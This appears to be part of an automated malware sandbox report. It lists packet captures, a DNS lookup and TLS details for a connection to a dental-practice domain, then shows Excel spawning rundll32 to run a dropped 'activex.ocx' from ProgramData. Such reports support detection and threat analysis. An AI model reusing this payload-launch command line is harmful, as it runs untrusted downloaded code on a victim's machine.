Jan 5, 2021 13:01:09.655785084 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655828953 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655844927 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655860901 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655874968 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655889988 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655905008 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655925035 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655939102 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655953884 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655976057 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655988932 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.655998945 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656004906 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656019926 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656034946 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656044960 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656049013 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656064034 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656078100 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656079054 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656094074 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656107903 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656116962 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656131983 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656141043 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656150103 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656169891 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656181097 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656184912 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656208038 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656224012 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656235933 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656238079 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656253099 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656254053 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656266928 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656286955 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656289101 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656306982 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656316042 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656327963 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656341076 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656342030 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656357050 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656373024 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656377077 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656394958 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656402111 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656414986 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656426907 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656430006 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656445026 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656456947 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656464100 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656487942 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656497002 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656508923 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656522989 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656526089 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656528950 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656533957 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656541109 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656560898 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656574011 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656584024 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.656591892 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656614065 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.656635046 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.661246061 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.661284924 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.661397934 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.661504984 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.844727993 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.844763994 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.844777107 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.844929934 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.845088959 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.845108032 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.845124960 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.845141888 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.845158100 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.845160007 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.845175028 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.845196962 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.845216036 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.849540949 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.849562883 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.849668980 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.033207893 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033250093 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033266068 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033291101 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033313990 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033329964 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033350945 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033375025 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033404112 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.033447027 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.033448935 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033473969 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033495903 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033519030 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033540010 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033565044 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033581972 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.033588886 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.033638954 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.033679962 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.037818909 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.037870884 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.037887096 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.037909985 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.037962914 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.038011074 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.040553093 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221724987 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221765995 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221787930 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221812010 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221815109 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221836090 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221848011 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221858025 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221874952 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221887112 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221888065 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221910954 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221913099 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221932888 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221932888 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221956968 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221960068 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.221977949 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.221982002 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222004890 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222006083 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222029924 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222031116 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222048998 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222069979 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222079039 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222094059 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222103119 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222115993 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222119093 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222131968 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222141981 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222151995 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222166061 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222187042 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222187996 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.222204924 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222223043 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.222409964 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.226051092 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.226080894 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.226099014 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.226110935 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.226124048 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.226140976 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.226142883 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.226243019 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410363913 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410408020 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410433054 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410454988 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410476923 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410499096 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410520077 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410542965 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410567045 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410577059 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410593033 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410615921 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410617113 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410636902 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410660028 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410670996 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410681963 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410703897 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410706997 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410727978 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410736084 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410751104 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410774946 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410784006 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410798073 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410820007 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410820961 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410840988 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410855055 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410864115 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410885096 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410892963 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410908937 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410921097 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410931110 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410949945 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410955906 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.410979033 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.410979986 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411001921 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411004066 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411025047 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411032915 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411047935 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411058903 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411070108 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411088943 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411092997 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411118031 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411120892 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411143064 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411144018 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411175013 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411184072 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411197901 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411210060 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411220074 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411242962 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.411242962 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411271095 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.411290884 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.414251089 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414288998 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414361954 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.414547920 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414573908 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414597034 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414618969 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414618015 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.414640903 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414657116 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.414663076 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.414689064 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.414726019 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599364996 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599395990 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599407911 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599420071 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599431992 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599483013 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599499941 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599514008 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599530935 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599615097 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599617958 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599656105 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599667072 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599739075 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599778891 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599796057 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599811077 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599827051 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599838972 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599850893 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599859953 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599883080 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599895954 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599910975 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599924088 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.599927902 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599944115 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599957943 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599972963 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.599972963 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600003004 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600034952 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600080013 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600090981 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600122929 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600140095 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600157022 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600214958 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600233078 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600245953 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600249052 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600265026 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600281000 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600295067 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600296974 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600308895 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600348949 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600356102 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600373030 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600388050 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600402117 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:10.600404024 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600446939 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.600707054 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.610342026 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:10.798475027 CET	443	49167	160.153.76.195	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2021 13:01:06.999558926 CET	52197	53	192.168.2.22	8.8.8.8
Jan 5, 2021 13:01:07.055907011 CET	53	52197	8.8.8.8	192.168.2.22
Jan 5, 2021 13:01:08.122844934 CET	53099	53	192.168.2.22	8.8.8.8
Jan 5, 2021 13:01:08.170912027 CET	53	53099	8.8.8.8	192.168.2.22
Jan 5, 2021 13:01:08.184622049 CET	52838	53	192.168.2.22	8.8.8.8
Jan 5, 2021 13:01:08.232651949 CET	53	52838	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 5, 2021 13:01:06.999558926 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	www.penrithdentalimplants.com.au	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 5, 2021 13:01:07.055907011 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	www.penrithdentalimplants.com.au	penrithdentalimplants.com.au		CNAME (Canonical name)	IN (0x0001)
Jan 5, 2021 13:01:07.055907011 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	penrithdentalimplants.com.au		160.153.76.195	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 5, 2021 13:01:07.479768038 CET	160.153.76.195	443	192.168.2.22	49167	CN=penrithdentalimplants.com.au, O=Nepean Dental Implants and Cosmetic Dentistry, L=Penrith, ST=New South Wales, C=AU CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Fri Aug 07 20:52:48 CEST 2020 Tue May 03 09:00:00 CEST 2011	Wed Oct 06 15:19:58 CEST 2021 Sat May 03 09:00:00 CEST 2031	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 5, 2021 13:01:07.479768038 CET	160.153.76.195	443	192.168.2.22	49167	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1748 Parent PID: 584

General

Start time:	13:00:41
Start date:	05/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f220000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2340 Parent PID: 1748

General

Start time:	13:00:50
Start date:	05/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Imagebase:	0xffcd0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

